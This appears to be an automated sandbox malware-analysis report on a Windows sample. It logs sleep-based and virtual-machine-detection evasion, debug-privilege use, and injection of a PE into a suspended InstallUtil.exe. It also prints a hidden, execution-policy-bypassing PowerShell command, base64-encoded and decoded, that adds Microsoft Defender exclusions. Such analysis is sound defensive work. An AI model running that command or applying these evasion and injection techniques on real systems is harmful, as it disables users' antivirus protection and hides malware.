Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58016s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57891s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57669s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57231s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57121s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57008s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56895s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56547s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56118s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55877s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55750s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55641s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep count: 8118 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 1388 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628 Thread sleep count: 3588 > 30
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99834s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628 Thread sleep count: 601 > 30
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99565s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98186s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98051s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -97922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -97810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -97593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -97484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 8000 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99874 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99546 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99437 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99328 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99219 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99108 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98877 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98750 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98640 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98526 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98360 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98234 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98125 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 97906 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99874 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99546 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99434 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99316 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 99187 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98921 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98804 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98687 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98574 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98468 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98359 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 98249 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 97989 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 97859 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 97746 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99670 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99448 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99122 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99001 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98624 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98507 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98389 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98272 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59881 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59757 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59387 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59278 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 59062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58942 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58801 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58643 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58397 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58259 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 58016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57669 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57231 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57121 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 57008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56895 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56118 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 56000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 55877 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 55750 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 55641 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99834
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99703
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99565
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 99108
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98527
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98406
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98295
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98186
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 98051
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 97922
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 97810
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 97703
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 97593
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 97484
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000004.00000002.2968906608.00000000013D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1975910314.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: EC3008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
